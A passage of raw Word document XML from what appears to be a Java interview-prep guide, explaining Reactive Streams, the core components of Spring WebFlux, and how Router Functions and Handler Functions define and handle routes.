          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469523D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sher.subscribe(subscriber); // Subscriber subscribes to the publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CC4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D67A4B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C263CE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6ABCC3">
          <v:rect id="_x0000_i2279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAFD2E"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eactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF74F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 Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Reactive Streams API provides non-blocking, asynchronous processing, which helps to handle large amounts of data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7553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Backpressure Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a built-in mechanism for backpressure, which ensures that a Publisher does not overwhelm a Subscriber with too much data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C166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eactive Streams allows for easy composition of different operators (such as map, filter, flatMap, etc.) to transform and process streams of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93A8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nteroperability</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows different reactive libraries (like RxJava, Project Reactor, Akka Streams) to communicate seamlessly since they all follow the same Reactive Streams specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1D21E"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D84BCB">
          <v:rect id="_x0000_i2280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6ACC7"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313F2D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xml:space="preserve"> defines a standard for asynchronous and non-blocking stream processing in Java, enabling the creation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The API focuses on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to ensure that consumers of data are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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81" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028422B" w14:textId="05577F1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0" w:name="_Toc197867724"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the core components of Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p w14:paraId="12DBFD73" w14:textId="6D4ABD81" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Spring WebFlux is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that supports the development of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Here are the core components of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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D36F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WebFlux DispatcherHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13732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xml:space="preserve"> is the central component of Spring WebFlux, responsible for dispatching HTTP requests to the appropriate handler method. It is similar to DispatcherServlet in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but works in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734B66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responsible for handling the web requests by delegating to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which find the appropriate controller or handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47034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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to invoke the methods of the controllers and send back the responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54D36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Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403E8A0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xml:space="preserve"> is responsible for mapping an HTTP request to an appropriate handler (i.e., controller method). In Spring WebFlux, the mapping is done asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43160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re are different types of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xml:space="preserve"> based on the configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1B7D5"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questMappingHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mapping URLs to handler methods in controller classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE62851"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impleUrlHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mapping a URL to a handler bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA57F45"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Handler Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E105DB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xml:space="preserve"> is used to invoke a handler (controller method). In Spring WebFlux, handler adapters support both </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotated</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods (using @RequestMapping or @GetMapping, etc.) and custom handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E84C2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is component adapts the handler method to a model that can return a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lik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which are the main abstractions in reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEA57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Reactive HTTP Handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DDFD7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se are the actual controllers or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responsible for handling the incoming requests. They can return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rom their methods. These handlers are reactive and non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951FCD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s can be implemented using either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DEE4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troller classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (similar to Spring MVC controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AAAF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programming style</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w: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as an alternative to annotations-based configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD1D0C"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Reactive Programming Support (Mono and Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE016F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are the core types for working with reactive streams in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF12F8"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single asynchronous value or an empty value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E7A84E"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a stream of 0 to N asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30AE0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se types enable handling asynchronous, non-blocking data streams and allow the application to respond to multiple concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91E9EA"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WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC76A8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provides an alternative to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be used to interact with other services in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4B5B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Router Functions (Functional Endpoints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB8DD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provide an alternative to the annotated controllers and allow you to define routes and their handlers programmatically in a more functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE181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y are useful in defining a more flexible routing structure where you can define HTTP method mappings using RouterFunction and handle requests with a corresponding HandlerFunction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F557E"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8. Exception Handling (WebExceptionHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F9785"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you to customize how exceptions are handled in a non-blocking and asynchronous manner, providing centralized error handling for the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA54C9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lastRenderedPageBreak/>
        <w:t>9. Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77A4F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ilters implement the WebFilter interface and can be applied globally or specifically to individual routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28C28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0. Reactive Security (Spring Security for WebFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC730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pring Security for WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides security support for reactive applications. It works in a non-blocking, asynchronous manner to support reactive authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02961BF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ncludes support for OAuth2, JWT, and session-based authentication, adapted for reactive streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC1B6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1. WebFlux Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72738F7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 you can implement the addCorsMappings method to configure Cross-Origin Resource Sharing (CORS) mappings for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D557EB7"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6513CA">
          <v:rect id="_x0000_i2282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB0EF2"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Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA912E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Main entry point for routing HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60483D6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Maps requests to appropriate handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69804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Invokes the handler (controller).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BC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HTTP Handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Handles the request and returns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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9BA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and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Core reactive types for asynchronous handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A21A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Non-blocking HTTP client for calling external services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A227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A functional approach for defining routes and handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527835E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Handles exceptions in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B975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Allows non-blocking operations such as logging, security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3561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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking security for reactive apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B9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Configures WebFlux's default behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C883691"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50DB7">
          <v:rect id="_x0000_i2283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A21451"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84" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6AAC2" w14:textId="320A8F5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1" w:name="_Toc197867725"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the roles of Router Functions and Handler Functions in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w14:paraId="2E03C3D5" w14:textId="11CB1CCB" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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vide an alternative to the traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotation-based controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Router Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040367B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responsible for defining the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the application. These routes map incoming HTTP requests (based on the URL and HTTP method) to specific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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE59A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RouterFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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typically used to set up the routing logic in a more functional, less declarative manner than using @RequestMapping or other annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19455C2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outer functions are typically configured in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuration class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be composed together for more complex routing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE34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1172C2E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7AAC8D6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48B8C48A" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7358B72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2D78196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HandlerFunction handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73737F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30F0223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075DF04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39D87CA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41332C3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63335A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435D0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outerFunctions.route() method defines a route for GET /hello, which will be handled by handler::handleHello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79B67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equestPredicates.GET("/goodbye") defines another route for GET /goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5ACA7A"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Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451687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responsible for handling the HTTP requests routed by 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is an interface that contains a single method, ServerResponse handle(ServerRequest request), which is invoked to process the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65C43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 functions are used to implement the business logic or processing logic for the incoming HTTP requests. They return a ServerResponse, which represents the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725DAB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can be thought of as an alternative to a controller method in Spring MVC but in a functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244325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4D4BEC4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74B339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1AAD07D2" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B11C52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73C5360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6FB72BE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11CD42D" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A049B4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0DC630A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0745A7E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646061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76509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1A28AA9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handleHello method processes a request and responds with a Hello, World! message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524471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handleGoodbye responds with Goodbye, World!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7B243"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How Router Functions and Handler Functions Work Together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370EB90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typically used together to provide a complete routing and handling mechanism in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD827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defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL, HTTP method, etc.) and tells Spring WebFlux which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should be called when a specific route is matched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE39E5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processes the request and returns the appropriate response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D905F"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Combining Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD86B8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 is a more complete example where both Router Functions and Handler Functions are used together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1B37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306DE6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0320093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F0E8A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6BE527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MyHandler handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118E02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425B8FA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4DA2096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5C5070B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50004D4"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CC5FA47" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121F57A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57725DA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5980EF5E"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26BDF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3F68847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27AD9CF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A6BBF98" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A1FA7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3B1295A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5304DDA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7CB7EDF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72FF8B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66546F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Config</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
